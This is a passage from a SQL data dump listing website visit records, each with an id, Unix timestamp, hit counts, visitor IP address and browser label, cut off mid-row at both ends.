178','chrome'),(540977,1602821901,1,1,0,0,'173.252.127.27','other'),(540978,1602821982,1,1,0,0,'209.17.97.66','other'),(540979,1602823372,1,1,0,0,'91.196.177.137','chrome'),(540980,1602823908,1,1,0,0,'91.196.178.38','chrome'),(540981,1602824281,1,1,0,0,'91.196.178.102','other'),(540982,1602824347,1,1,0,0,'31.13.103.111','other'),(540983,1602824348,1,1,0,0,'31.13.103.120','other'),(540984,1602824856,1,1,0,0,'95.135.90.9','chrome'),(540985,1602826132,1,1,0,0,'31.13.127.111','other'),(540986,1602826587,1,1,0,0,'91.196.178.82','chrome'),(540987,1602827282,1,1,0,0,'31.13.103.120','other'),(540988,1602827283,1,1,0,0,'31.13.103.5','other'),(540989,1602827716,1,1,0,0,'31.13.127.19','other'),(540990,1602828314,1,1,0,0,'91.196.178.187','chrome'),(540991,1602828477,1,1,0,0,'31.13.127.24','other'),(540992,1602828478,1,1,0,0,'31.13.127.111','other'),(540993,1602830184,1,1,0,0,'37.52.114.23','other'),(540994,1602830263,2,2,0,0,'31.13.127.119','other'),(540995,1602830296,1,1,0,0,'173.252.95.119','other'),(540996,1602830880,1,1,0,0,'173.252.79.1','other'),(540997,1602830898,1,1,0,0,'173.252.87.21','other'),(540998,1602830927,1,1,0,0,'94.153.6.206','chrome'),(540999,1602830980,1,1,0,0,'31.13.127.6','other'),(541001,1602831115,2,2,0,0,'31.13.103.118','other'),(541002,1602832219,1,1,0,0,'31.13.103.8','other'),(541003,1602832220,1,1,0,0,'31.13.103.117','other'),(541004,1602832631,2,2,0,0,'31.13.103.5','other'),(541005,1602833977,1,1,0,0,'173.252.95.6','other'),(541006,1602834488,1,1,0,0,'31.13.103.16','other'),(541007,1602834490,1,1,0,0,'31.13.103.116','other'),(541008,1602835362,1,1,0,0,'88.155.52.20','chrome'),(541009,1602835393,1,1,0,0,'69.171.251.19','other'),(541010,1602836036,1,1,0,0,'31.13.103.17','other'),(541011,1602836037,1,1,0,0,'31.13.103.119','other'),(541012,1602836078,2,2,0,0,'5.255.253.92','other'),(541013,1602837399,1,1,0,0,'91.196.178.92','chrome'),(541014,1602838158,1,1,0,0,'46.211.68.133','chrome'),(541015,1602838175,2,2,0,0,'69.171.251.17','other'),(541016,1602838178,1,1,0,0,'69.171.251.16','other'),(541017,1602839010,1,1,0,0,'46.211.14.38','chrome'),(541018,1602841873,1,1,0,0,'46.133.89.67','chrome'),(541019,1602842038,1,1,0,0,'173.252.83.6','other'),(541020,1602842040,1,1,0,0,'173.252.83.4','other'),(541021,1602842503,1,1,0,0,'91.196.178.49','chrome'),(541022,1602843192,1,1,0,0,'173.252.95.14','other'),(541023,1602844595,1,1,0,0,'5.255.253.92','other'),(541024,1602844643,1,1,0,0,'173.252.95.119','other'),(541025,1602844740,1,1,0,0,'91.196.178.25','chrome'),(541026,1602846053,1,1,0,0,'173.252.95.4','other'),(541027,1602846745,1,1,0,0,'31.13.127.111','other'),(541029,1602846746,2,2,0,0,'31.13.127.24','other'),(541034,1602846747,1,1,0,0,'173.252.83.120','other'),(541037,1602846748,1,1,0,0,'173.252.83.10','other'),(541038,1602849462,1,1,0,0,'31.13.103.18','other'),(541039,1602849463,1,1,0,0,'31.13.103.2','other'),(541040,1602850153,1,1,0,0,'31.13.103.6','other'),(541041,1602850154,1,1,0,0,'31.13.103.9','other'),(541042,1602850717,1,1,0,0,'31.13.127.16','other'),(541043,1602850718,1,1,0,0,'31.13.127.9','other'),(541045,1602851809,1,1,0,0,'185.237.217.15','chrome'),(541046,1602851903,1,1,0,0,'31.13.103.120','other'),(541048,1602852699,1,1,0,0,'31.13.103.7','other'),(541049,1602852981,1,1,0,0,'5.255.253.92','other'),(541050,1602853757,1,1,0,0,'46.133.81.117','chrome'),(541051,1602853783,1,1,0,0,'46.211.69.71','chrome'),(541052,1602853854,1,1,0,0,'31.13.127.3','other'),(541054,1602855300,1,1,0,0,'31.13.127.14','other'),(541055,1602855301,1,1,0,0,'31.13.127.116','other'),(541056,1602855953,1,1,0,0,'91.196.178.175','chrome'),(541057,1602856467,2,2,0,0,'31.13.127.6','other'),(541062,1602856544,1,1,0,0,'31.42.161.88','firefox'),(541063,1602856590,1,1,0,0,'173.252.87.23','other'),(541066,1602856687,1,1,0,0,'91.196.178.51','chrome'),(541067,1602857115,1,1,0,0,'5.255.253.87','other'),(541068,1602857149,1,1,0,0,'173.252.127.117','other'),(541069,1602857261,1,1,0,0,'5.45.207.150','other'),(541070,1602857426,1,1,0,0,'5.58.56.72','chrome'),(541071,1602857546,1,1,0,0,'31.13.127.5','other'),(541072,1602857548,1,1,0,0,'31.13.127.10','other'),(541073,1602859966,1,1,0,0,'91.196.178.25','chrome'),(541074,1602860254,1,1,0,0,'91.196.178.176','chrome'),(541075,1602863822,1,1,0,0,'173.252.79.21','other'),(541076,1602864755,2,2,0,0,'31.13.103.11','other'),(541077,1602866893,1,1,0,0,'173.252.95.120','other'),(541078,1602867793,1,1,0,0,'173.252.87.13','other'),(541079,1602869557,1,1,0,0,'185.237.217.20','chrome'),(541080,1602869801,1,1,0,0,'66.220.149.3','other'),(541081,1602870344,1,1,0,0,'91.196.178.25','chrome'),(541082,1602871478,1,1,0,0,'176.121.5.111','chrome'),(541083,1602871695,1,1,0,0,'173.252.87.117','other'),(541084,1602871807,1,1,0,0,'173.252.127.16','other'),(541085,1602871809,1,1,0,0,'173.252.127.20','other'),(541086,1602872065,1,1,0,0,'91.196.178.109','chrome'),(541087,1602873832,1,1,0,0,'173.252.83.24','other'),(541089,1602873833,1,1,0,0,'173.252.83.119','other'),(541090,1602873835,1,1,0,0,'173.252.111.120','other'),(541093,1602873837,1,1,0,0,'173.252.111.2','other'),(541094,1602874019,1,1,0,0,'91.196.178.132','chrome'),(541095,1602875708,1,1,0,0,'31.13.127.18','other'),(541096,1602875825,1,1,0,0,'46.133.89.3','chrome'),(541097,1602876369,1,1,0,0,'176.108.124.201','chrome'),(541098,1602876386,1,1,0,0,'173.252.107.2','other'),(541099,1602877477,1,1,0,0,'31.13.103.17','other'),(541100,1602877479,1,1,0,0,'31.13.103.7','other'),(541101,1602879513,1,1,0,0,'91.196.178.37','chrome'),(541102,1602881720,1,1,0,0,'66.220.149.1','other'),(541103,1602881722,1,1,0,0,'66.220.149.8','other'),(541104,1602883807,1,1,0,0,'94.153.36.22','other'),(541105,1602884078,15,15,0,0,'5.255.253.92','other'),(541106,1602884121,1,1,0,0,'91.196.178.86','chrome'),(541107,1602884161,1,1,0,0,'31.13.103.17','other'),(541109,1602884171,2,2,0,0,'5.255.253.87','other'),(541110,1602884267,2,2,0,0,'213.180.203.111','other'),(541111,1602884309,1,1,0,0,'213.180.203.96','other'),(541112,1602884380,1,1,0,0,'213.180.203.253','other'),(541113,1602884582,1,0,1,0,'66.249.66.92',''),(541114,1602887165,1,1,0,0,'31.13.103.16','other'),(541115,1602887167,1,1,0,0,'31.13.103.14','other'),(541116,1602887850,1,1,0,0,'31.13.103.116','other'),(541118,1602891072,1,1,0,0,'31.13.103.117','other'),(541119,1602891073,1,1,0,0,'31.13.103.21','other'),(541120,1602891937,1,1,0,0,'31.13.127.20','other'),(541121,1602891979,1,1,0,0,'5.255.253.92','other'),(541122,1602891993,1,1,0,0,'5.255.253.87','other'),(541123,1602895412,2,2,0,0,'31.13.103.17','other'),(541124,1602895951,2,2,0,0,'31.13.103.6','other'),(541125,1602898616,1,1,0,0,'173.252.87.111','other'),(541126,1602898617,1,1,0,0,'173.252.87.13','other'),(541127,1602899489,1,1,0,0,'31.13.103.7','other'),(541128,1602899490,1,1,0,0,'31.13.103.3','other'),(541129,1602900803,1,1,0,0,'173.252.87.2','other'),(541130,1602900805,1,1,0,0,'173.252.87.23','other'),(541131,1602901968,1,1,0,0,'5.255.253.92','other'),(541132,1602906378,1,1,0,0,'31.13.103.13','other'),(541133,1602906379,1,1,0,0,'31.13.103.112','other'),(541134,1602906632,1,1,0,0,'31.13.103.118','other'),(541136,1602909437,1,1,0,0,'91.196.178.30','chrome'),(541137,1602909950,1,1,0,0,'94.153.26.206','chrome'),(541138,1602913089,1,1,0,0,'173.252.79.11','other'),(541139,1602914983,1,1,0,0,'46.211.0.96','chrome'),(541140,1602915061,1,1,0,0,'188.163.28.154','chrome'),(541141,1602915345,1,1,0,0,'91.196.178.30','chrome'),(541142,1602915370,1,1,0,0,'31.13.127.120','other'),(541143,1602916052,1,1,0,0,'46.133.241.99','chrome'),(541144,1602916300,1,1,0,0,'95.158.42.51','other'),(541145,1602916381,1,1,0,0,'91.196.178.25','chrome'),(541146,1602916902,1,1,0,0,'31.13.127.22','other'),(541147,1602916903,1,1,0,0,'31.13.127.15','other'),(541148,1602918058,1,1,0,0,'173.252.111.118','other'),(541149,1602918097,1,1,0,0,'31.13.127.17','other'),(541150,1602918098,1,1,0,0,'31.13.127.16','other'),(541151,1602918112,1,1,0,0,'91.196.178.61','chrome'),(541152,1602918258,1,1,0,0,'91.229.122.12','chrome'),(541153,1602918830,1,1,0,0,'88.155.74.70','chrome'),(541154,1602919160,1,1,0,0,'31.13.127.14','other'),(541155,1602919161,1,1,0,0,'31.13.127.120','other'),(541156,1602920251,1,1,0,0,'31.13.127.6','other'),(541157,1602920608,2,2,0,0,'31.13.127.4','other'),(541158,1602920609,1,1,0,0,'31.13.127.23','other'),(541159,1602920997,2,2,0,0,'31.13.127.112','other'),(541160,1602921409,1,1,0,0,'173.252.111.17','other'),(541161,1602921428,1,1,0,0,'31.13.127.21','other'),(541162,1602922099,1,1,0,0,'91.196.178.25','chrome'),(541163,1602922664,1,1,0,0,'173.252.111.9','other'),(541164,1602922665,1,1,0,0,'173.252.111.116','other'),(541165,1602922666,2,2,0,0,'173.252.111.18','other'),(541166,1602922679,2,2,0,0,'173.252.111.5','other'),(541167,1602922680,1,1,0,0,'173.252.87.6','other'),(541168,1602922681,2,2,0,0,'173.252.111.11','other'),(541169,1602922705,1,1,0,0,'69.171.251.3','other'),(541170,1602922721,1,1,0,0,'66.220.149.18','other'),(541171,1602922756,1,1,0,0,'91.196.178.170','chrome'),(541172,1602923038,1,1,0,0,'66.220.149.22','other'),(541174,1602923043,1,1,0,0,'128.124.25.108','chrome'),(541175,1602923061,1,1,0,0,'173.252.111.24','other'),(541176,1602923064,1,1,0,0,'173.252.111.7','other'),(541178,1602923065,1,1,0,0,'173.252.83.14','other'),(541180,1602923070,1,1,0,0,'69.171.251.19','other'),(541181,1602923113,1,1,0,0,'173.252.95.1','other'),(541182,1602923142,1,1,0,0,'69.171.251.24','other'),(541183,1602923143,1,1,0,0,'173.252.95.19','other'),(541184,1602923151,1,1,0,0,'37.55.238.143','chrome'),(541185,1602923160,1,1,0,0,'91.196.178.25','chrome'),(541186,1602923176,1,1,0,0,'173.252.127.116','other'),(541187,1602923223,1,1,0,0,'173.252.127.27','other'),(541188,1602923273,1,1,0,0,'31.13.115.19','other'),(541189,1602923488,1,1,0,0,'66.220.149.13','other'),(541190,1602923506,1,1,0,0,'173.252.127.6','other'),(541191,1602923517,1,1,0,0,'173.252.95.20','other'),(541192,1602923765,1,1,0,0,'173.252.95.118','other'),(541193,1602923771,1,1,0,0,'91.196.178.132','chrome'),(541194,1602923818,1,1,0,0,'66.220.149.31','other'),(541195,1602923925,1,1,0,0,'66.220.149.27','other'),(541197,1602923998,1,1,0,0,'69.171.251.7','other'),(541198,1602924079,1,1,0,0,'69.171.251.24','other'),(541199,1602924080,1,1,0,0,'173.252.95.2','other'),(541201,1602924084,1,1,0,0,'173.252.95.6','other'),(541202,1602924148,1,1,0,0,'69.171.251.17','other'),(541204,1602924178,1,1,0,0,'31.13.127.16','other'),(541205,1602924226,1,1,0,0,'66.220.149.17','other'),(541206,1602924229,1,1,0,0,'66.220.149.5','other'),(541207,1602924343,1,1,0,0,'31.13.127.6','other'),(541208,1602924352,1,1,0,0,'173.252.95.10','other'),(541209,1602924382,1,1,0,0,'173.252.127.26','other'),(541210,1602924386,1,1,0,0,'66.220.149.29','other'),(541211,1602924470,1,1,0,0,'173.252.95.3','other'),(541212,1602924924,1,1,0,0,'69.171.251.21','other'),(541213,1602924934,1,1,0,0,'69.171.251.5','other'),(541214,1602925091,1,1,0,0,'173.252.95.15','other'),(541215,1602925175,1,1,0,0,'66.220.149.19','other'),(541216,1602925230,2,2,0,0,'91.196.178.25','chrome'),(541217,1602925490,1,1,0,0,'66.220.149.35','other'),(541218,1602925687,2,2,0,0,'173.252.95.6','other'),(541219,1602925940,1,1,0,0,'66.220.149.22','other'),(541220,1602926036,1,1,0,0,'173.252.95.14','other'),(541221,1602926038,1,1,0,0,'173.252.95.117','other'),(541222,1602926137,1,1,0,0,'173.252.95.17','other'),(541223,1602926179,1,1,0,0,'69.171.251.16','other'),(541224,1602926234,1,1,0,0,'66.220.149.1','other'),(541225,1602926368,2,2,0,0,'66.220.149.112','other'),(541226,1602926392,1,1,0,0,'173.252.95.20','other'),(541227,1602926466,1,1,0,0,'31.13.127.1','other'),(541228,1602926781,1,1,0,0,'31.13.103.16','other'),(541229,1602926782,1,1,0,0,'31.13.103.21','other'),(541230,1602927174,1,1,0,0,'213.110.148.165','chrome'),(541231,1602927186,1,1,0,0,'66.220.149.116','other'),(541232,1602927410,1,1,0,0,'173.252.95.116','other'),(541233,1602927425,1,1,0,0,'31.13.127.117','other'),(541234,1602927675,1,1,0,0,'173.252.95.119','other'),(541235,1602927676,1,1,0,0,'173.252.95.13','other'),(541236,1602927725,1,1,0,0,'69.171.251.23','other'),(541237,1602927726,1,1,0,0,'31.13.127.19','other'),(541238,1602927878,1,1,0,0,'173.252.95.120','other'),(541239,1602927993,1,1,0,0,'66.220.149.2','other'),(541240,1602928455,1,1,0,0,'173.252.95.4','other'),(541241,1602928829,1,1,0,0,'173.252.127.17','other'),(541242,1602929610,2,2,0,0,'31.13.127.120','other'),(541243,1602929665,2,2,0,0,'91.196.178.25','chrome'),(541244,1602929754,1,1,0,0,'173.252.127.19','other'),(541245,1602929760,2,2,0,0,'173.252.111.10','other'),(541247,1602929764,1,1,0,0,'173.252.95.113','other'),(541248,1602929771,1,1,0,0,'31.13.127.4','other'),(541249,1602929773,2,2,0,0,'66.220.149.4','other'),(541250,1602929774,1,1,0,0,'173.252.95.117','other'),(541251,1602929775,1,1,0,0,'31.13.115.23','other'),(541252,1602929784,2,2,0,0,'173.252.95.19','other'),(541255,1602929787,1,1,0,0,'69.171.251.8','other'),(541256,1602929790,2,2,0,0,'69.171.251.22','other'),(541257,1602929808,3,3,0,0,'173.252.95.3','other'),(541258,1602929827,1,1,0,0,'66.220.149.27','other'),(541259,1602929829,2,2,0,0,'66.220.149.117','other'),(541260,1602929831,1,1,0,0,'173.252.111.1','other'),(541261,1602929832,1,1,0,0,'91.196.178.84','chrome'),(541262,1602929846,1,1,0,0,'173.252.95.20','other'),(541263,1602929852,2,2,0,0,'173.252.95.22','other'),(541264,1602929872,1,1,0,0,'69.171.251.9','other'),(541266,1602929874,1,1,0,0,'173.252.111.113','other'),(541267,1602929882,1,1,0,0,'31.13.103.3','other'),(541268,1602929891,1,1,0,0,'173.252.95.7','other'),(541269,1602929893,1,1,0,0,'173.252.127.3','other'),(541270,1602929921,2,2,0,0,'69.171.251.23','other'),(541271,1602929923,2,2,0,0,'173.252.95.1','other'),(541272,1602929927,1,1,0,0,'31.13.115.118','other'),(541273,1602929939,1,1,0,0,'173.252.127.11','other'),(541274,1602929945,1,1,0,0,'173.252.127.30','other'),(541275,1602929960,1,1,0,0,'173.252.127.13','other'),(541276,1602929963,1,1,0,0,'173.252.95.116','other'),(541277,1602929969,1,1,0,0,'31.13.115.24','other'),(541278,1602929986,1,1,0,0,'69.171.251.119','other'),(541279,1602929989,1,1,0,0,'69.171.251.113','other'),(541280,1602930008,1,1,0,0,'31.13.127.15','other'),(541281,1602930011,1,1,0,0,'173.252.127.27','other'),(541282,1602930043,2,2,0,0,'66.220.149.25','other'),(541283,1602930046,1,1,0,0,'173.252.127.29','other'),(541284,1602930055,1,1,0,0,'173.252.95.8','other'),(541285,1602930057,1,1,0,0,'46.211.31.26','chrome'),(541286,1602930084,1,1,0,0,'173.252.127.4','other'),(541287,1602930100,2,2,0,0,'69.171.251.7','other'),(541288,1602930134,1,1,0,0,'31.13.115.18','other'),(541289,1602930173,1,1,0,0,'173.252.95.2','other'),(541290,1602930220,1,1,0,0,'31.13.127.119','other'),(541291,1602930246,1,1,0,0,'66.220.149.30','other'),(541292,1602930250,1,1,0,0,'31.13.115.8','other'),(541293,1602930257,3,3,0,0,'173.252.95.23','other'),(541294,1602930259,2,2,0,0,'173.252.127.12','other'),(541295,1602930262,1,1,0,0,'69.171.251.120','other'),(541296,1602930281,1,1,0,0,'173.252.111.9','other'),(541297,1602930385,1,1,0,0,'173.252.87.16','other'),(541298,1602930387,1,1,0,0,'173.252.95.5','other'),(541299,1602930404,1,1,0,0,'31.13.127.2','other'),(541300,1602930412,1,1,0,0,'31.13.115.120','other'),(541301,1602930458,2,2,0,0,'66.220.149.18','other'),(541302,1602930480,1,1,0,0,'66.220.149.34','other'),(541303,1602930492,2,2,0,0,'173.252.95.21','other'),(541304,1602930501,1,1,0,0,'66.220.149.8','other'),(541305,1602930510,1,1,0,0,'31.13.103.119','other'),(541306,1602930633,1,1,0,0,'31.129.175.163','chrome'),(541307,1602930660,1,1,0,0,'31.13.127.19','other'),(541308,1602930664,1,1,0,0,'69.171.251.18','other'),(541309,1602930670,3,3,0,0,'173.252.95.13','other'),(541310,1602930714,1,1,0,0,'31.13.127.3','other'),(541311,1602930734,1,1,0,0,'173.252.111.119','other'),(541312,1602930752,1,1,0,0,'173.252.95.20','other'),(541313,1602930773,2,2,0,0,'173.252.127.119','other'),(541314,1602930867,1,1,0,0,'66.220.149.20','other'),(541315,1602930921,1,1,0,0,'66.220.149.7','other'),(541316,1602930932,2,2,0,0,'173.252.95.9','other'),(541317,1602930943,1,1,0,0,'31.13.103.17','other'),(541318,1602930953,1,1,0,0,'31.13.127.12','other'),(541319,1602930956,1,1,0,0,'31.13.115.2','other'),(541320,1602930960,1,1,0,0,'69.171.251.17','other'),(541321,1602931016,1,1,0,0,'92.113.191.53','chrome'),(541322,1602931056,1,1,0,0,'69.171.251.22','other'),(541323,1602931076,1,1,0,0,'31.13.127.23','other'),(541324,1602931077,1,1,0,0,'37.73.115.180','chrome'),(541325,1602931081,1,1,0,0,'173.252.95.112','other'),(541326,1602931088,1,1,0,0,'173.252.95.111','other'),(541327,1602931103,1,1,0,0,'173.252.95.16','other'),(541328,1602931131,1,1,0,0,'66.220.149.111','other'),(541329,1602931143,1,1,0,0,'69.171.251.11','other'),(541330,1602931151,1,1,0,0,'31.13.127.18','other'),(541331,1602931164,1,1,0,0,'173.252.95.15','other'),(541332,1602931254,1,1,0,0,'173.252.95.10','other'),(541333,1602931282,1,1,0,0,'69.171.251.1','other'),(541334,1602931300,1,1,0,0,'173.252.127.15','other'),(541335,1602931388,1,1,0,0,'173.252.127.28','other'),(541336,1602931513,2,2,0,0,'173.252.95.6','other'),(541337,1602931559,1,1,0,0,'31.13.127.6','other'),(541338,1602931577,1,1,0,0,'173.252.95.117','other'),(541339,1602931662,1,1,0,0,'31.13.127.5','other'),(541340,1602931664,1,1,0,0,'69.171.251.12','other'),(541341,1602931687,1,1,0,0,'173.252.95.5','other'),(541342,1602931700,1,1,0,0,'91.196.178.25','chrome'),(541343,1602931713,1,1,0,0,'173.252.95.19','other'),(541344,1602931731,1,1,0,0,'69.171.251.19','other'),(541345,1602931764,1,1,0,0,'173.252.95.24','other'),(541346,1602931813,1,1,0,0,'173.252.95.118','other'),(541347,1602931909,1,1,0,0,'173.252.127.7','other'),(541348,1602931914,1,1,0,0,'69.171.251.13','other'),(541349,1602931931,1,1,0,0,'173.252.95.8','other'),(541350,1602931943,1,1,0,0,'173.252.95.3','other'),(541351,1602931981,1,1,0,0,'66.220.149.6','other'),(541352,1602932073,1,1,0,0,'31.13.127.15','other'),(541353,1602932106,1,1,0,0,'173.252.127.20','other'),(541354,1602932160,2,2,0,0,'173.252.95.9','other'),(541355,1602932199,2,2,0,0,'173.252.95.4','other'),(541356,1602932222,1,1,0,0,'31.13.127.7','other'),(541357,1602932244,1,1,0,0,'69.171.251.10','other'),(541358,1602932248,1,1,0,0,'66.220.149.24','other'),(541359,1602932331,1,1,0,0,'66.220.149.35','other'),(541360,1602932417,2,2,0,0,'173.252.127.9','other'),(541361,1602932421,1,1,0,0,'66.220.149.112','other'),(541362,1602932452,1,1,0,0,'69.171.251.113','other'),(541363,1602932469,1,1,0,0,'173.252.127.11','other'),(541364,1602932553,1,1,0,0,'31.13.127.14','other'),(541365,1602932554,2,2,0,0,'173.252.95.111','other'),(541366,1602932574,1,1,0,0,'69.171.251.20','other'),(541367,1602932637,1,1,0,0,'66.220.149.11','other'),(541369,1602932641,2,2,0,0,'66.220.149.5','other'),(541370,1602932644,1,1,0,0,'69.171.251.16','other'),(541371,1602932722,1,1,0,0,'173.252.95.11','other'),(541372,1602932732,1,1,0,0,'66.220.149.9','other'),(541373,1602932742,1,1,0,0,'31.13.127.1','other'),(541374,1602932798,2,2,0,0,'173.252.95.7','other'),(541375,1602932830,1,1,0,0,'31.13.115.4','other'),(541376,1602932937,1,1,0,0,'173.252.95.119','other'),(541377,1602932946,1,1,0,0,'173.252.111.112','other'),(541378,1602932950,1,1,0,0,'31.13.127.12','other'),(541379,1602933030,1,1,0,0,'173.252.127.14','other'),(541380,1602933040,1,1,0,0,'66.220.149.8','other'),(541381,1602933046,3,3,0,0,'173.252.95.24','other'),(541382,1602933054,1,1,0,0,'173.252.111.120','other'),(541383,1602933055,1,1,0,0,'173.252.95.8','other'),(541384,1602933205,2,2,0,0,'173.252.95.112','other'),(541385,1602933230,1,1,0,0,'31.13.115.22','other'),(541386,1602933338,1,1,0,0,'69.171.251.10','other'),(541387,1602933421,1,1,0,0,'69.171.251.3','other'),(541388,1602933542,1,1,0,0,'69.171.251.5','other'),(541389,1602933587,1,1,0,0,'173.252.95.13','other'),(541390,1602933680,1,1,0,0,'31.13.127.4','other'),(541391,1602933876,1,1,0,0,'31.13.127.20','other'),(541392,1602933913,2,2,0,0,'173.252.127.28','other'),(541393,1602933995,1,1,0,0,'173.252.95.24','other'),(541394,1602934168,1,1,0,0,'66.220.149.116','other'),(541395,1602934248,2,2,0,0,'173.252.95.120','other'),(541396,1602934328,1,1,0,0,'69.171.251.12','other'),(541397,1602934329,2,2,0,0,'31.13.127.17','other'),(541398,1602934450,1,1,0,0,'173.252.95.23','other'),(541399,1602934506,1,1,0,0,'31.13.127.7','other'),(541400,1602934512,2,2,0,0,'173.252.95.11','other'),(541401,1602934579,1,1,0,0,'66.220.149.7','other'),(541402,1602934580,1,1,0,0,'69.171.251.8','other'),(541403,1602934796,1,1,0,0,'173.252.95.8','other'),(541404,1602934836,1,1,0,0,'173.252.95.22','other'),(541405,1602934853,1,1,0,0,'66.220.149.118','other'),(541406,1602934894,1,1,0,0,'66.220.149.29','other'),(541407,1602934900,1,1,0,0,'91.196.177.62','other'),(541408,1602934970,1,1,0,0,'31.13.127.119','other'),(541409,1602934981,1,1,0,0,'31.13.127.116','other'),(541410,1602934983,1,1,0,0,'31.13.127.5','other'),(541411,1602935086,1,1,0,0,'69.171.251.116','other'),(541412,1602935133,1,1,0,0,'69.171.251.17','other'),(541413,1602935168,1,1,0,0,'173.252.95.10','other'),(541414,1602935203,1,1,0,0,'31.13.127.18','other'),(541415,1602935245,2,2,0,0,'31.13.127.17','other'),(541416,1602935313,1,1,0,0,'69.171.251.6','other'),(541417,1602935326,1,1,0,0,'31.13.115.119','other'),(541418,1602935327,2,2,0,0,'173.252.95.21','other'),(541419,1602935354,2,2,0,0,'69.171.251.9','other'),(541420,1602935462,1,1,0,0,'31.13.115.112','other'),(541421,1602935467,1,1,0,0,'173.252.95.14','other'),(541422,1602935543,2,2,0,0,'31.13.127.117','other'),(541423,1602935559,1,1,0,0,'66.220.149.117','other'),(541424,1602935669,1,1,0,0,'173.252.95.6','other'),(541425,1602935709,1,1,0,0,'173.252.95.9','other'),(541426,1602935775,1,1,0,0,'173.252.127.24','other'),(541427,1602935836,1,1,0,0,'173.252.95.8','other'),(541428,1602935859,1,1,0,0,'173.252.95.22','other'),(541429,1602935891,1,1,0,0,'173.252.127.10','other'),(541430,1602935998,2,2,0,0,'31.13.127.20','other'),(541431,1602936020,1,1,0,0,'69.171.251.118','other'),(541432,1602936053,2,2,0,0,'173.252.95.120','other'),(541433,1602936083,1,1,0,0,'173.252.127.1','other'),(541434,1602936087,1,1,0,0,'31.13.115.15','other'),(541435,1602936102,1,1,0,0,'173.252.95.19','other'),(541436,1602936103,1,1,0,0,'173.252.95.20','other'),(541437,1602936124,1,1,0,0,'69.171.251.112','other'),(541438,1602936130,2,2,0,0,'66.220.149.4','other'),(541439,1602936131,1,1,0,0,'173.252.127.8','other'),(541440,1602936167,1,1,0,0,'91.196.178.61','other'),(541441,1602936194,1,1,0,0,'66.220.149.2','other'),(541442,1602936230,1,1,0,0,'173.252.95.7','other'),(541443,1602936241,2,2,0,0,'173.252.95.4','other'),(541444,1602936257,1,1,0,0,'31.13.127.10','other'),(541445,1602936272,1,1,0,0,'69.171.251.111','other'),(541446,1602936330,1,1,0,0,'173.252.95.21','other'),(541447,1602936361,1,1,0,0,'69.171.251.13','other'),(541448,1602936370,1,1,0,0,'66.220.149.118','other'),(541449,1602936381,1,1,0,0,'91.196.178.152','chrome'),(541450,1602936394,1,1,0,0,'66.220.149.27','other'),(541451,1602936522,1,1,0,0,'69.171.251.20','other'),(541452,1602936634,1,1,0,0,'31.13.127.21','other'),(541453,1602936670,1,1,0,0,'173.252.127.14','other'),(541454,1602936673,1,1,0,0,'31.13.115.9','other'),(541455,1602936719,1,1,0,0,'31.13.127.3','other'),(541456,1602936749,1,1,0,0,'69.171.251.116','other'),(541457,1602936795,1,1,0,0,'66.220.149.21','other'),(541458,1602936855,1,1,0,0,'66.220.149.7','other'),(541459,1602936856,1,1,0,0,'31.13.115.10','other'),(541460,1602936878,1,1,0,0,'91.196.178.30','chrome'),(541461,1602936943,2,2,0,0,'173.252.95.1','other'),(541462,1602936972,1,1,0,0,'173.252.95.18','other'),(541463,1602936976,1,1,0,0,'31.13.127.17','other'),(541464,1602936987,1,1,0,0,'173.252.95.12','other'),(541465,1602937007,1,1,0,0,'173.252.127.26','other'),(541466,1602937132,1,1,0,0,'173.252.95.11','other'),(541467,1602937135,1,1,0,0,'195.10.210.210','chrome'),(541468,1602937137,1,1,0,0,'173.252.95.119','other'),(541470,1602937231,1,1,0,0,'66.220.149.33','other'),(541471,1602937244,1,1,0,0,'173.252.127.23','other'),(541472,1602937300,1,1,0,0,'66.220.149.13','other'),(541473,1602937316,1,1,0,0,'31.13.127.117','other'),(541474,1602937419,1,1,0,0,'31.13.127.113','other'),(541475,1602937420,2,2,0,0,'173.252.95.5','other'),(541476,1602937423,1,1,0,0,'173.252.95.117','other'),(541477,1602937451,1,1,0,0,'69.171.251.4','other'),(541478,1602937463,1,1,0,0,'69.171.251.112','other'),(541479,1602937587,1,1,0,0,'31.13.127.20','other'),(541480,1602937632,1,1,0,0,'173.252.95.16','other'),(541481,1602937654,1,1,0,0,'173.252.95.3','other'),(541482,1602937702,1,1,0,0,'173.252.95.9','other'),(541483,1602937842,1,1,0,0,'173.252.95.23','other'),(541484,1602937843,1,1,0,0,'31.13.115.10','other'),(541485,1602937875,1,1,0,0,'69.171.251.116','other'),(541486,1602937984,1,1,0,0,'173.252.95.20','other'),(541487,1602938039,1,1,0,0,'31.13.127.23','other'),(541488,1602938111,1,1,0,0,'69.171.251.117','other'),(541489,1602938226,1,1,0,0,'31.13.103.13','other'),(541490,1602938232,1,1,0,0,'173.252.95.13','other'),(541491,1602938270,1,1,0,0,'66.220.149.13','other'),(541492,1602938362,3,3,0,0,'173.252.95.5','other'),(541493,1602938420,2,2,0,0,'31.13.127.8','other'),(541495,1602938430,1,1,0,0,'69.171.251.17','other'),(541496,1602938556,1,1,0,0,'31.13.115.119','other'),(541497,1602938557,1,1,0,0,'66.220.149.22','other'),(541498,1602938581,1,1,0,0,'69.171.251.9','other'),(541499,1602938584,1,1,0,0,'173.252.95.6','other'),(541500,1602938605,1,1,0,0,'66.220.149.113','other'),(541501,1602938689,1,1,0,0,'66.220.149.26','other'),(541502,1602938714,1,1,0,0,'173.252.95.19','other'),(541503,1602938723,1,1,0,0,'31.13.127.117','other'),(541504,1602938948,1,1,0,0,'31.13.103.14','other'),(541506,1602938959,1,1,0,0,'173.252.95.111','other'),(541507,1602939007,1,1,0,0,'31.13.127.22','other'),(541508,1602939016,1,1,0,0,'31.13.115.118','other'),(541509,1602939098,1,1,0,0,'173.252.127.116','other'),(541510,1602939138,1,1,0,0,'173.252.95.11','other'),(541511,1602939285,1,1,0,0,'173.252.95.20','other'),(541512,1602939565,1,1,0,0,'31.13.127.9','other'),(541513,1602939595,2,2,0,0,'173.252.95.116','other'),(541514,1602939635,1,1,0,0,'173.252.95.117','other'),(541515,1602939668,1,1,0,0,'31.13.115.113','other'),(541516,1602939700,2,2,0,0,'173.252.95.9','other'),(541517,1602939724,1,1,0,0,'69.171.251.1','other'),(541518,1602939766,1,1,0,0,'31.13.127.2','other'),(541519,1602939923,1,1,0,0,'173.252.95.13','other'),(541520,1602940081,1,1,0,0,'66.220.149.28','other'),(541521,1602940126,1,1,0,0,'173.252.95.19','other'),(541522,1602940195,1,1,0,0,'173.252.95.14','other'),(541523,1602940264,1,1,0,0,'31.13.127.120','other'),(541524,1602940355,1,1,0,0,'91.196.178.25','chrome'),(541525,1602940362,1,1,0,0,'66.220.149.13','other'),(541526,1602940390,1,1,0,0,'66.220.149.10',